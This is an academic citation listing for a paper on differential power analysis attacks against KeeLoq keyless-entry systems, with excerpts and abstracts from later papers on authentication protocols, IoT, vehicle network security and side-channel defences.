Conference Paper

On the Power of Power Analysis in the Real World: A Complete Break of the KeeLoq Code Hopping Scheme

Authors:
To read the full-text of this research, you can request a copy directly from the authors.

Abstract

KeeLoq remote keyless entry systems are widely used for access control purposes such as garage openers or car door systems. We present the first successful differential power analysis attacks on numerous commercially available products employing KeeLoq code hopping. Our new techniques combine side-channel cryptanalysis with specific properties of the KeeLoq algorithm. They allow for efficiently revealing both the secret key of a remote transmitter and the manufacturer key stored in a receiver. As a result, a remote control can be cloned from only ten power traces, allowing for a practical key recovery in few minutes. After extracting the manufacturer key once, with similar techniques, we demonstrate how to recover the secret key of a remote control and replicate it from a distance, just by eavesdropping on at most two messages. This key-cloning without physical access to the device has serious real-world security implications, as the technically challenging part can be outsourced to specialists. Finally, we mount a denial of service attack on a KeeLoq access control system. All proposed attacks have been verified on several commercial KeeLoq products.

No full-text available

Request Full-text Paper PDF

To read the full-text of this research,
you can request a copy directly from the authors.

... Once the private key is known, all encryptions carried out via this key-pair can effortlessly be read out by the adversary. There already exist dozens of approaches, such as physical key extraction or viruses, which have been successfully applied to attack such systems [1][2][3]. ...
... This transformation is mostly insensitive to the aforementioned effects and can furthermore be used to scale down the image. An example of how these transformed images may look like can be found in Figure 3. 1. Using the value 0 as a threshold, the gabor-transformed image is further transformed into a 2D binary array, which is flattened to a 1D bitstring and finally represents the response of the PUF. ...
... This prevents directly vertically or horizontally neighboring blocks from being activated simultaneously and is hoped to increase the overall decorrelation between responses, as the simulation shows that the influence on the speckle pattern appears to be smaller when light travels through neighboring pixels, compared to locally unrelated pixels. The corresponding datasets will be called type B. An example of how such a challenge could look like in comparison to one without restrictions can be found in figure 4. 1. The other restriction will be to define an upper boundary for how many blocks can be activated simultaneously, while there is no local restriction on which blocks these can be. ...
Preprint
Full-text available
In this thesis, several linear and non-linear machine learning attacks on optical physical unclonable functions (PUFs) are presented. To this end, a simulation of such a PUF is implemented to generate a variety of datasets that differ in several factors in order to find the best simulation setup and to study the behavior of the machine learning attacks under different circumstances. All datasets are evaluated in terms of individual samples and their correlations with each other. In the following, both linear and deep learning approaches are used to attack these PUF simulations and comprehensively investigate the impact of different factors on the datasets in terms of their security level against attackers. In addition, the differences between the two attack methods in terms of their performance are highlighted using several independent metrics. Several improvements to these models and new attacks will be introduced and investigated sequentially, with the goal of progressively improving modeling performance. This will lead to the development of an attack capable of almost perfectly predicting the outputs of the simulated PUF. In addition, data from a real optical PUF is examined and both compared to that of the simulation and used to see how the machine learning models presented would perform in the real world. The results show that all models meet the defined criterion for a successful machine learning attack.
... Once the private key is known, all encryptions carried out via this key-pair can effortlessly be read out by the adversary. There already exist dozens of approaches, such as physical key extraction or viruses, which have been successfully applied to attack such systems [1][2][3]. ...
... This transformation is mostly insensitive to the aforementioned effects and can furthermore be used to scale down the image. An example of how these transformed images may look like can be found in Figure 3. 1. Using the value 0 as a threshold, the gabor-transformed image is further transformed into a 2D binary array, which is flattened to a 1D bitstring and finally represents the response of the PUF. ...
... This prevents directly vertically or horizontally neighboring blocks from being activated simultaneously and is hoped to increase the overall decorrelation between responses, as the simulation shows that the influence on the speckle pattern appears to be smaller when light travels through neighboring pixels, compared to locally unrelated pixels. The corresponding datasets will be called type B. An example of how such a challenge could look like in comparison to one without restrictions can be found in figure 4. 1. The other restriction will be to define an upper boundary for how many blocks can be activated simultaneously, while there is no local restriction on which blocks these can be. ...
Thesis
Full-text available
In this thesis, several linear and non-linear machine learning attacks on optical physical unclonable functions (PUFs) are introduced. For this purpose, a simulation of such a PUF is implemented to generate a variety of datasets that differ in several factors, to find the superior simulation setup, as well as to investigate the behaviors of the machine learning attacks under different circumstances. The main focus lies on the number of bits of the applied challenges and multiple challenge restrictions, which are intended to increase the input-output-complexity of the simulated PUF. All the datasets are evaluated with respect to the individual samples and their correlations among each other. In the following, both linear and deep learning approaches are used to attack these PUF simulations to comprehensively study the influence of the varying factors on the datasets with respect to their security level against adversaries. An additional focus will lie on the different behaviors of both attacking methods, i.e. the major differences in their performances and which approach should be preferred under which circumstances. Several independent metrics are used to highlight these differences from varying perspectives. Furthermore, multiple enhancements to these first machine learning models and new attacks that fall into the two categories will successively be introduced and investigated, while aiming for gradually better modeling performances. This leads to the development of an attack that is able to almost perfectly predict the outputs of the simulated PUF. Also, data from a real optical PUF will be investigated and compared to those from the simulation. This data is further used to see how the introduced machine learnings models would perform in the real world. Here, quite impressive results could be found, such that all the models fulfilled the defined criterion for a successful machine learning attack. For all the datasets, there are quite large differences between both the linear and non-linear attacking approaches, which this thesis will try to thoroughly elaborate on and give further insights into the benefits of differing architectures.
... In the existing adversary models presented in [42,[44][45][46][47][48][49][50][51][52], the communication chan nel between the communicating parties can be controlled by the adversary, who can ini tiate malicious operations, such as intercepting, eavesdropping on, and modifying transport messages. In terms of the forward secrecy, can also be admitted and corrup valid parties to obtain long-term keys. ...
... In the existing adversary models presented in [42,[44][45][46][47][48][49][50][51][52], the communication channel between the communicating parties can be controlled by the adversary, who can initiate malicious operations, such as intercepting, eavesdropping on, and modifying transport messages. In terms of the forward secrecy, A can also be admitted and corrupt valid parties to obtain long-term keys. ...
Article
Full-text available
The rapid development of mobile computing (e.g., mobile health, mobile payments, and smart homes) has brought great convenience to our lives. It is well-known that the security and privacy of user information from these applications and services is critical. Without the prevention provided by an authentication mechanism, safety vulnerabilities may accumulate, such as illegal intrusion access resulting in data leakage and fraudulent abuse. Luckily, the two-factor authentication (2FA) protocols can secure access and communication for mobile computing. As we understand it, ex-isting 2FA authentication protocols weaken security in the pursuit of high efficiency. How effi-ciency can be achieved while preserving the protocol’s security remains a challenge. In this study, we designed a robust and effective 2FA protocol based on elliptic curve cryptography (ECC) for authentication of users and service providers. We proved the robustness (respectively, the effec-tiveness) of the presented protocol with the heuristic analysis and security verification provided by the ProVerif tool (respectively, with a performance comparison based on six schemes). Perfor-mance comparisons in terms of message rounds, communication, and computation overheads showed that our scheme was superior to the exiting schemes or comparable as a whole; i.e., only two rounds, 1376 bits, and 1.818 ms were required in our scheme, respectively. The evaluation results showed that the proposed 2FA protocol provides a better balance between security and availability compared to state-of-the-art protocols.
... A wide range of applications, from business to government and military uses, may be realized with secure and continuous user access to designated smart home appliances [17]. Due to the sensitive nature of the operations and inherited vulnerabilities of the public channel, such as real-time data manipulation, clogging, replay, jamming, etc., the use of these smart home appliances for such applications is otherwise regarded as problematic [18,19]. Although various security schemes for the smart-home environment have recently been developed, many of these schemes have turned out to be insecure or unworkable. ...
... 3. The is under the user's possession, and any wicked intruder cannot control it [37]. [17][18][19], Refs. [20][21][22] is considered in this article, where the adversary has the subsequent capabilities: 2. Public/open channel communication fully controlled by the T . ...
Article
Full-text available
For the betterment of human life, smart Internet of Things (IoT)-based systems are needed for the new era. IoT is evolving swiftly for its applications in the smart environment, including smart airports, smart buildings, smart manufacturing, smart homes, etc. A smart home environment includes resource-constrained devices that are interlinked, monitored, controlled, and analyzed with the help of the Internet. In a distributed smart environment, devices with low and high computational power work together and require authenticity. Therefore, a computationally efficient and secure protocol is needed. The authentication protocol is employed to ensure that authorized smart devices communicate with the smart environment and are accessible by authorized personnel only. We have designed a novel, lightweight secure protocol for a smart home environment. The introduced novel protocol can withstand well-known attacks and is effective with respect to computation and communication complexities. Comparative, formal, and informal analyses were conducted to draw the comparison between the introduced protocol and previous state-of-the-art protocols
... A can replay, and/or send a forged messages. A can also stop any message transmitted on the communication channel [30,31,32]. Using the power analysis, A can interpret the leaked data from a physically captured drone and from stolen smart card [25,32]. ...
... Let U m be a registered valid user of the system and his/her smart device is accidentally stolen by an attacker which can be insider or outsider U A . The adversary U A can retrieve the sensitive information {RID m , ID DRn , T C u , A , B, C, τ m , Gen(ů), Rep(ů), h(ů), t} from the mobile device through power analysis [30,34]. However, U A cannot extract the unique parameters ...
Article
The Internet of drones (IoD) is a very useful application of the Internet of things (IoT) and it can help the daily life comfort through various functions including the smart city surveillance. The IoD can enhance the comfort to reach inaccessible and hard to access sites and can save lot of effort, time and cost. However, in addition to traditional threats, the IoD may suffer from new threats and requires customized methods to combat the security weaknesses. Very recently, Wazid et al. proposed a security solution for securing IoD application scenario and claimed its security. However, in this paper we show that their scheme cannot resist stolen verifier and traceability attacks. Moreover, an attacker with access to the verifier, can impersonate any user, drone or server of the system. An enhanced scheme is then proposed to cope with these weaknesses. The security claims of proposed scheme are endorsed by formal and informal security analysis. Moreover, the performance and security comparisons show that proposed scheme completes a cycle of authentication with a slight increase in computation time, but it offers all the required security features as compared with the scheme of Wazid et al.
... Many scholars [26][27][28][29][30][31][32][33][34][35][36][37][38][39][40][41][42][43] have studied the attacker model of password authentication protocol, among which the Dolev-Yao model [31] is the most classic. Due to the openness of the network, side channel attacks have developed rapidly in recent years (such as timing attacks, electromagnetic attacks and energy consumption attacks). ...
... Side-channel attack means that the attacker has strong ability and can extract security parameters stored in smart devices (eg., smart cards). When analyzing the authentication protocol in GLOMONET, this paper will adopt a new attack model which combines multiple attack models, such as those presented in reported works [26,27,[32][33][34][35][36][37][38][39][40][41][42][43][44][45][46][47] . Finally, the capacities of the adversary for two-factor authentication schemes in GLOMONET are summarized as follows. ...
Article
Full-text available
Designing a secure and efficient anonymous authentication protocol for roaming services in global mobile networks is a hot topic in the field of information security protocols. Based on the widely accepted attacker model, this paper analyzes the security of three representative anonymous authentication protocols in global mobile networks. It is pointed out that: (1) Xu et al.’s protocol cannot resist the claimed offline password guessing attack and mobile user impersonation attack, and do not achieve mobile user untraceability and forward security; (2) Gupta et al.’s protocol cannot resist offline password guessing attacks, and temporary information disclosure attacks; (3) Madhusudhan et al.’s protocol cannot resist mobile user impersonation attack, foreign agent impersonation attack, replay attack, offline password guessing attack and session key disclosure attack, and cannot realize the anonymity and untraceability and forward security of users. It is emphasized that the fundamental reason for the failure of these protocols lies in the violation of the four basic principles of protocol design: Public key principle, Forward security principle, User anonymity principle and Anti offline guessing attack principle. The specific mistakes of these schemes are clarified, and the corresponding correction methods are proposed. ~~~~~~~~~~~~~~~~~~~~ Qiu S, Wang D. Revisiting three anonymous two-factor authentication schemes for roaming service in global mobility networks. J Surveill Secur Saf 2021;2:66-82. http://dx.doi.org/10.20517/jsss.2020.28
... Also, it can be initiated by capturing the key fob signal and redirecting it to the vehicle. For example, in [52] researchers were able to hack key fob block cipher and perform relay signal attack, and were able to lock and unlock doors. The attacker needs to be in the range of the key fob to be able to intercept the signal for this type of attack. ...
... Other examples include remote attacks carried out on a Jeep Cherokee [43]. Another attack is the keyless fob attack used to forcibly unlock the doors of a vehicle [52]. A summary of in-vehicle network based attacks includes: Table 4 identifies some of the attacks initiated ...
Article
Full-text available
As connectivity between and within vehicles increases, so does concern about safety and security. Various automotive serial protocols are used inside vehicles such as Controller Area Network (CAN), Local Interconnect Network (LIN), and FlexRay. CAN Bus is the most used in-vehicle network protocol to support exchange of vehicle parameters between Electronic Control Units (ECUs). This protocol lacks security mechanisms by design and is therefore vulnerable to various attacks. Furthermore, connectivity of vehicles has made the CAN Bus vulnerable not only from within the vehicle but also from outside. With the rise of connected cars, more entry points and interfaces have been introduced on board vehicles, thereby also leading to a wider potential attack surface. Existing security mechanisms focus on the use of encryption, authentication, and vehicle Intrusion Detection Systems (IDS), which operate under various constraints such as low bandwidth, small frame size (e.g., in the CAN protocol), limited availability of computational resources, and real-time sensitivity. We survey and classify current cryptographic and IDS approaches and compare these approaches based on criteria such as real-time constraints, types of hardware used, changes in CAN Bus behaviour, types of attack mitigation, and software/ hardware used to validate these approaches. We conclude with mitigation strategies limitations and research challenges for the future.
... In which the adversary A has more capabilities as compared with D-Y model [31]. A under eCK model [32], has authority over the public channel and can perform any task including sending , receiving/listening, forging and blocking a legitimate message. A can expose the information stored on a captured SM [32]. ...
... A under eCK model [32], has authority over the public channel and can perform any task including sending , receiving/listening, forging and blocking a legitimate message. A can expose the information stored on a captured SM [32]. A has access to all public information and SMs are not trusted, which means and dishonest SM can act as an attacker. ...
Conference Paper
Recently, in 2019, Kumar et al. (IEEE Transactions on Smart Grid 10.4 (2018): 4349-4359) proposed an ECC based lightweight authentication and Key agreement scheme (LAKA) to secure the communication among a smart meter (SM) and a neighbourhood area network (NAN) gateway. The LAKA scheme was proved as secure and efficient as per the comparisons performed by Kumar et al. Specifically, it was argued through security analysis that LAKA provides anonymity and resistance to related attacks. However, the specific analysis in this paper contradicts their claim and it is shown here that in addition to ephemeral secret leakage attack and lack of untraceability, the LAKA is also vulnerable to stolen verifier attack.
... As per the CK-adversary model, an adversary can also compromise the confidential credentials and the session keys and states in the sessions. Additionally,  can also capture the smart devices and perform a power analysis attack [34,35] to obtain stored information. As per the eCK model, the attacker is also allowed to launch a critical compromise impersonation attack. ...
... Assume that  is a privileged insider and can apprehend the of after the registration. Now  can read all the stored information in the though power analysis [34,35,42]. But to acquire any secret parameter from ,  requires the knowledge of , and . ...
Article
Fog computing (FC) is an infrastructure consisting of decentralized computing, where computing resources such as storage, applications, and data are scattered among the cloud and data source. Fog computing inherits similar privacy and security concerns present in cloud computing, such as authentication and key management issues. Recently, Wazid et al. presented a scheme of authentication key exchange for fog computing called SAKA-FC to address these issues. We analyzed and identified that the SAKA-FC suffers from some severe vulnerabilities. Furthermore, we presented an improved scheme to mitigate these problems while retaining its strengths. The formal security analysis of the proposed scheme is validated through BAN logic. At the same time, the AVISPA tool is employed for automated formal security verification. Informal security analysis is conducted to attest that the proposal can confront the known attacks. Using computation and communication costs as the metrics, the proposed scheme is also compared with some state-of-the-art schemes. The proposed scheme achieves the same communication cost as of SAKA-FC, whereas the difference in computation cost is 24%. This increase in computation cost is justifiable as the proposal is resistant to clogging attacks and provides better security than the prior schemes.
... The RF blaster contains a security code that is paired with the IoT device; this means the current security code is preserved even during power loss, and subsequent reconfiguration is unnecessary. The RF blaster uses the KeeLoq algorithm [22] which transmits 66 data bits: 34 unencrypted, and 32 encrypted using a rolling code. A rolling code transmitter provides a secure encrypted RF transmission comprised of the rolling code and an interleaved trinary bit-fixed code. ...
... Using artillery.io [22], we compared the latency of these infrastructures over tasks suited to our device's blockchain use cases. ...
Article
Our paper presents a novel fire prevention system based on the Internet of Things (IoT) that uses the Ethereum distributed ledger (blockchain) to build a verifiable record of fire risk events. Our proposed system can operate off- and online and does not require additional electrical installation, thereby lowering homeowner costs. The device plugs into the stove’s outlet, and when smoke is detected, the device discontinues electricity to the stove and informs the homeowner via a smartphone notification. The homeowner can restore electricity through a wireless button located close to the stove. The system uses a webservice based on Google Firebase to establish connection between the IoT device and the smartphone. Our system uses a Smart Contract (SC) engraved in the blockchain to register trigger events from the IoT device and its sensor. We use a virtual Ethereum node supported by Infura infrastructure to provide stability when an event is published. Apps are available for Android and iOS devices that allow a homeowner to control and turn off their stove and receive alerts about the state of the sensors. We propose a 950–50 ms sleep–wake cycle configuration for the IoT module to limit power consumption. Our configurations allow our system to consume on average only 9.8 mW. Our product is an innovative achievement for fire prevention systems.
... During the registration procedure, the TA stores the values {ID V , TID V , A V , P K s } in the memory of VH without adopting any cryptographic methods. Moreover, under the threat model of Xu et al.'s scheme (Section 1.2), an adversary A can easily extract these values by power analysis attacks [18,19]. Based on this attack, A could easily perform impersonation attacks and compromise the privacy of users. ...
Article
Full-text available
In the Internet of Vehicles (IoV) environments, vehicles and roadside units (RSUs) communicate predominantly through public channels. These vehicles and RSUs exchange various data, such as traffic density, location, speed, etc. Therefore, secure and efficient authentication and key establishment (AKE) are needed to guarantee user privacy when exchanging data between vehicles and RSUs. Recently, a secure and computationally AKE scheme have been proposed to construct secure IoV environments. In their research, the authors asserted that their AKE scheme provides comprehensive security properties, protecting against various potential threats while simultaneously ensuring session key integrity, robust mutual authentication. This paper proved that the previous scheme does not prevent various attacks using logical and mathematical analyses. Moreover, we demonstrated that this scheme does not meet the essential security requirements and correctness of security assumptions. We perform the simulation proof using AVISPA, which is well known as a formal verification tool. To enhance the resilience of attacks, we propose solutions aimed at developing more robust and efficient AKE for IoV environments.
... Moreover, an adversary cannot speculate on the secret parameters (secret key, nonce, random number, etc.) in polynomial time because of its large size. Finally, an adversary can obtain data stored in embedded devices that are not equipped with detailed tamper-proof techniques [20][21][22]. ...
Article
Full-text available
The Internet of Things (IoT) with cloud services are important functionalities in the latest IoT systems for providing various convenient services. These cloud-enabled IoT environments collect, analyze, and monitor surrounding data, resulting in the most effective handling of large amounts of heterogeneous data. In these environments, secure authentication with a key agreement mechanism is essential to ensure user and data privacy when transmitting data between the cloud server and IoT nodes. In this study, we prove that the previous scheme contains various security threats, and hence cannot guarantee essential security requirements. To overcome these security threats, we propose an improved authentication and key agreement scheme for cloud-enabled IoT using PUF. Furthermore, we evaluate its security by performing informal, formal (mathematical), and simulation analyses using the AVISPA tool and ROR model. The performance and security properties of our scheme are subsequently compared with those of other related schemes. The comparison confirms that our scheme is suitable for a practical cloud-enabled IoT environment because it provides a superior security level and is more efficient than contemporary schemes.
... The key generation center (KGC) is a fully trusted entity because it generates and manages the secret key for UEs and MTC devices (MDs). However, UEs and MDs are not physically protected and an adversary can obtain the data in the memory of UEs and MDs using power analysis attack [10,15,16]. ...
Article
Full-text available
The Internet of Things (IoT) and 5G networks play important roles in the latest systems for managing and monitoring various types of data. These 5G based IoT environments collect various data in real-time using micro-sensors as IoT things devices and sends the collected data to a server for further processing. In this scenario, a secure authentication and key agreement scheme is needed to ensure privacy when exchanging data between IoT nodes and the server. Recently, Cao et al. in “LSAA: A lightweight and secure access authentication scheme for both UE and mMTC devices in 5G networks” presented a new authentication scheme to protect user privacy. They contend that their scheme not only prevents various protocol attacks, but also achieves mutual authentication, session key security, unlinkability, and perfect forward/backward secrecy. This paper demonstrates critical security weaknesses of their scheme using informal and formal (mathemati) analysis: it does not prevent a single point of failure and impersonation attacks. Further, their proposed scheme does not achieve mutual authentication and correctness of security assumptions, and we perform simulation analysis using a formal verification tool to its security flaws. To ensure attack resilience, we put forward some solutions that can assist constructing more secure and efficient access authentication scheme for 5G networks.
... Indeed, their ability to rely on the accidental transmission of information via environmental parameters of the working regime of a computing device allows them to retrieve confidential information from fully functional cryptographic implementations. Since the work of Kocher [37], where the power consumption of a smartcard was employed to derive the secret key of the DES cipher running on it, side channel attacks were used to breach the security of a large variety of devices, ranging from inexpensive microcontrollers for IoT devices and RFIDs [21], [46], [50] through mid-range system on chips [7], [9] to full desktop and laptop grade CPUs [24], [25], [36], [39], [45]. ...
Article
Full-text available
Power consumption and electromagnetic emissions analyses are well established attack avenues for secret values extraction in a large range of embedded devices. Countermeasures against these attacks are approached at different levels, from modified logic styles, to changes in the software implementations. In this work, we propose a microarchitectural modification to a compact RISC-V SoC, the OpenTitan open source silicon root of trust, providing a code morphing countermeasure against power and electromagnetic emissions side channel attacks. Our approach allows the countermeasure to be applied transparently, without the need for any software modification to the cryptographic primitive running on OpenTitan. Our microarchitecture integration of a morphing engine also allows us to provide transparent protection to memory operations. We validate our approach through measurements on an actual FPGA prototype on a Xilinx Artix-7. Our integrated morphing engine increases the FPGA resource consumption by less than 8%, plus the resources required by an RNG of choice, with respect to the original OpenTitan SoC. Our design shows a side channel attack resistance improvement of at least 250×250\times in the Measurements-To-Disclose metric with respect to the unprotected design. We benchmark the performance of our proposed architecture on all the ISO/IEC standard symmetric block ciphers, including, among the other AES, reducing the execution time overhead by 21×21\times to 141×141\times with respect to a continuously morphing software solution.
... The simulated attack model in this paper is considered as per assumptions mentioned in [23][24][25][26][27][28][29] and described as follows: ...
Article
Internet of drones (IoD) has gained significant importance in recent times due to its applications in several critical domains ranging from commercial to defense and rescue operations. With several drones flying in different zones to carry out specified tasks, the IoD can be beneficial to gather the real time data for interpretation by the users. However, the data access is carried out through an open channel and battery operated drones. Therefore, the drones’ security and privacy are crucial for accomplishing mission-critical, safety-critical, or surveillance operations. In 2020, Bera et al. presented a certificate based access control scheme for securing the IoD access and argued the scheme’s security through formal and informal methods. However, the analysis presented in this paper shows that the scheme of Bera et al. does not provide anonymity and is insecure against multiple threats, including drone impersonation, the man in the middle, and replay attacks. We then designed a generic certificate based access control scheme to provide inter-drone and drone to ground station access control/authentication scheme in the IoD domain (GCACS-IoD). The GCACS-IoD is provably secure against the known attacks and provides anonymity. GCACS-IoD extends security while preserving computation and communication efficiencies.
... SCA attacks belong to the most serious threats to embedded crypto devices and often target the secret (cryptographic) key in a device that keeps personal data and communications secure [11], [26] or even white-box implementations [13]. There are many examples of SCA attacks in the real-world such as [9], [23], [57] and more recent ones [20], [37], [56]. ...
... Since then multiple side channels have been demonstrated, exploiting various effects, such as timing [1,11,20,21], power consumption [56], electromagnetic (EM) emanations [22,39,69], shared microarchitectural components [43,78], and even acoustic and photonic emanations [4,44,58,73]. These side channels pose a severe risk to the security of systems, and in particular to cryptographic implementations, and effective side-channel attacks have been demonstrated against block and stream ciphers [47,70], public-key systems, both traditional [30,65] and post quantum [68], cryptographic primitives implemented in real-world devices [5,35], and even non-cryptographic algorithms [8]. ...
... We often also say that the two use different side-channel distinguishers. Side-channel attacks using the above three techniques have been reported on a wide variety of cryptographic implementations, see, e.g., [154,402,410,412,434,500] including some real-world applications [196]. ...
Chapter
Full-text available
Side-channel attacks (SCAs) are powerful attacks based on the information obtained from the implementation of cryptographic devices. Profiling side-channel attacks has received a lot of attention in recent years due to the fact that this type of attack defines the worst-case security assumptions. The SCA community realized that the same approach is actually used in other domains in the form of supervised machine learning. Consequently, some researchers started experimenting with different machine learning techniques and evaluating their effectiveness in the SCA context. More recently, we are witnessing an increase in the use of deep learning techniques in the SCA community with strong first results in side-channel analyses, even in the presence of countermeasures. In this chapter, we consider the evolution of profiling attacks, and subsequently we discuss the impacts they have made in the data preprocessing, feature engineering, and classification phases. We also speculate on the future directions and the best-case consequences for the security of small devices.
... This was revealed at a hacking conference [78], and the surprising part is that Windows XP used the same cipher on some of its registry keys as found in [137]. Some of the famous examples that were leaked or were reverse-engineered, then attacked are RC4 [228], DST [114], KeeLoq [43,168,173,264], and Megamos [340]. Noting that we state these algorithms since these are examples of trusted ciphers that were later on attacked. ...
Thesis
Full-text available
Living in an era where new devices are astonishing considering their high capabilities, new visions and terms have emerged. Moving to smart phones, Wireless Sensor Networks, high-resolution cameras, pads and much more, has mandated the need to rethink the technological strategy that is used today. Starting from social media, where apparently everything is being exposed, moving to highly powerful surveillance cameras, in addition to real time health monitoring, it can be seen that a high amount of data is being stored in the Cloud and servers. This introduced a great challenge for their storage and transmission especially in the limited resourced platforms that are characterized by: (a) limited computing capabilities, (b) limited energy and source of power and (c) open infrastructures that transmit data over wireless unreliable networks. One of the extensively studied platforms is the Vehicular Ad-hoc Networks which tends to have many limitations concerning the security field. In this dissertation, we focus on improving the security of transmitted multimedia contents in different limited platforms, while preserving a high security level. Limitations of these platforms are taken into consideration while enhancing the execution time of the secure cipher. Additionally, if the proposed cipher is to be used for images, the intrinsic voluminous and complex nature of the managed images is also taken into account. In the first part, we surveyed one of the limited platforms that is interesting for many researchers, which is the Vehicular Ad-hoc Networks. In order to pave the way for researchers to find new efficient security solutions, it is important to have one reference that can sum most of the recent works. It almost investigates every aspect in this field shedding the light over different aspects this platform possesses. Then, in order to propose any new security solution and validate its robustness and the level of randomness of the ciphered image, a simple and efficient test is proposed. This test proposes using the randomness tools, TestU01 and Practrand, in order to assure a high level of randomness. After running these tests on well known ciphers, some flaws were exposed. Proceeding to the next part, a novel proposal for enhancing the well-known ultra lightweight cipher scheme, Speck, is proposed. The main contribution of this work is to obtain a better version compared to Speck. In this proposal, 26 rounds in Speck were reduced to 7 rounds in Speck-R while enhancing the execution time by at least 50%. First, we validate that Speck-R meets the randomness tests that are previously proposed. Additionally, a dynamic substitution layer adds more security against key related attacks and highly fortifies the cipher. Speck-R was implemented on different limited arduino chips and in all cases, Speck-R was ahead of Speck. Then, in order to prove that this cipher can be used for securing images, especially in VANETS/IoV, where images can be extensively re/transmitted, several tests were exerted and results showed that Speck-R indeed possesses the high level of security desired in any trusted cipher. Extensive experiments validate our proposal from both security and performance point of views and demonstrate the robustness of the proposed scheme against the most-known types of attacks.
... In the beginning, automotive security mainly concerned the locking systems and immobilizers because of the usage of keyless entry systems [9]. Many studies have demonstrated the possibility to access the system without permission [10][11][12][13][14]. With the increasing connectivity of vehicles, the external communication can be seen as new attack surfaces in modern vehicles. ...
Article
Full-text available
As the intelligent car-networking represents the new direction of the future vehicular development, automotive security plays an increasingly important role in the whole car industry chain. On condition that the accompanying problems of security are proofed, vehicles will provide more convenience while ensuring safety. Security models can be utilized as tools to rationalize the security of the automotive system and represent it in a structured manner. It is essential to improve the knowledge about security models by comparing them besides proposing new methods. This paper aims to give a comprehensive introduction to the topic of security models for the Intelligent Transport System (ITS). A survey of the current methodologies for security modeling is conducted and a classification scheme is subsequently proposed. Furthermore, the existing framework and methods to build automotive security models are broadly examined according to the features of automotive electronic system. A number of fundamental aspects are defined to compare the presented methods in order to comprehend the automotive security modeling in depth.
... SCA attacks belong to the most serious threats to embedded crypto devices and often target the secret (cryptographic) key in a device that keeps personal data and communications secure [11], [26] or even white-box implementations [13]. There are many examples of SCA attacks in the real-world such as [9], [23], [57] and more recent ones [20], [37], [56]. ...
Preprint
Full-text available
We introduce screen gleaning, a TEMPEST attack in which the screen of a mobile device is read without a visual line of sight, revealing sensitive information displayed on the phone screen. The screen gleaning attack uses an antenna and a software-defined radio (SDR) to pick up the electromagnetic signal that the device sends to the screen to display, e.g., a message with a security code. This special equipment makes it possible to recreate the signal as a gray-scale image, which we refer to as an emage. Here, we show that it can be used to read a security code. The screen gleaning attack is challenging because it is often impossible for a human viewer to interpret the emage directly. We show that this challenge can be addressed with machine learning, specifically, a deep learning classifier. Screen gleaning will become increasingly serious as SDRs and deep learning continue to rapidly advance. In this paper, we demonstrate the security code attack and we propose a testbed that provides a standard setup in which screen gleaning could be tested with different attacker models. Finally, we analyze the dimensions of screen gleaning attacker models and discuss possible countermeasures with the potential to address them.
... As declared in [29][30][31][32][33][34][35][36][37], the same threat model is acknowledged in this article in which according to the abilities of the attacker (), following steps are taken: ...
Article
While the 6G/IoT transition is on the cards, the real advantage of this transition can be realized only if the user privacy and security are guaranteed. The smartcard and password based authentication protocols can help the transition in a rapid way. However, due to insecurities and/or heavy computation, many such protocols cannot cope with the dynamic requirements of future generation networks. Recently, Kaul and Awasthi presented a robust and secure user authentication protocol based on resource friendly symmetric cryptography primitives. They declared that their introduced protocol is convenient, efficient, and secure for the applications in real-world. In contrast, this article describes that protocol of Kaul and Awasthi is not secure because an attacker can easily find the identity of a legal user that is being sent on the public channel. Further, by using the identity of a legitimate user, an attacker can impersonate himself as a legitimate user of the system and can enjoy the services given by the server. So, their protocol is susceptible to user impersonation attacks, and their claim of being secure is proven to be wrong. Therefore, we have extended their work and presented an upgraded scheme by ensuring secure communication over the entire channel. Moreover, our proposed scheme is safe not solely against user impersonation attack but also major security attacks with reasonable communication, computation, and storage costs and is a better candidate for deployment in 6G/IoT networks.
... Information hackers are targeting the users for getting important information from impersonates and this trend is increasing rapidly [16]. They do so by re-programming the interfaces of the communicating channels [11], [12], [13]. Thus, some of the major secure techniques are not able to provide secure systems to the users. ...
Article
Full-text available
Protecting passwords is now a big challenge because users want to do all types of work online via user-friendly devices such as mobile, tablets etc. Now, It is difficult to implement the secure heavy weight algorithms such as AES, RSA etc. in hardware constrained devices. It has been observed that users want all types of security services in an online public environment. Authentication is the first and foremost step to enhance security. Various applications are available for real time authentications such as keyless car entry and opening home-doors through security algorithms under remote keyless entry System (RKES). Now, it is the demand of the time to implement the lightweight security algorithms without compromising the security. In order to fulfill this challenge, this paper proposed a strong model for enhancing authentication security. In this work, strong authentication techniques are implemented with the light weight algorithms. This model received good comparison results.
Article
Full-text available
The Internet of Vehicle (IoV) is revolutionizing the automobile sector by allowing vehicles to interact with one another and with roadside infrastructure. The Controller Area Network (CAN) is a vital component of such smart vehicles, allowing communication between various Electronic Control Units (ECUs). However, the CAN protocol's intrinsic lack of security renders it open to a variety of cyber-attacks, posing substantial hazards to both safety and privacy.This research investigates the use of deep learning with multi-layer perceptron to improve the security of CAN networks inside the IoV framework. We discuss current threats to CAN networks, including spoofing, replay, and denial-of-service attacks, and how deep learning may be used to identify and mitigate these threats efficiently. We propose a unique deep learning-based defense mechanism for real-time threat detection. The suggested method is highly effective in identifying and mitigating potential risks, as evidenced by extensive testing on real-world CAN datasets. Based on our findings, the proposed solution has the potential to considerably enhance the security of CAN networks in the Internet of Vehicles, making car communication systems more secure and reliable.
Chapter
This chapter discusses recent physical attacks on FPGAs, which can also be performed remotely from within the FPGA itself. Such attacks can be executed despite established secure isolation at the digital level. Although FPGAs are meant to implement digital logic, their underlying physical circuit properties can be exploited to implement special circuitry that is either sensitive to the data-dependent on-chip voltage fluctuations or can influence them. These capabilities break all previous assumptions on how secure FPGA virtualization can be implemented and lift physical fault and power analysis attacks from a local to a potentially remote attacker. This new attack type has implications on orders of magnitude more users, particularly in cloud platforms. To address this novel threat, this chapter presents countermeasures that can be deployed from the perspective of a cloud hypervisor.
Article
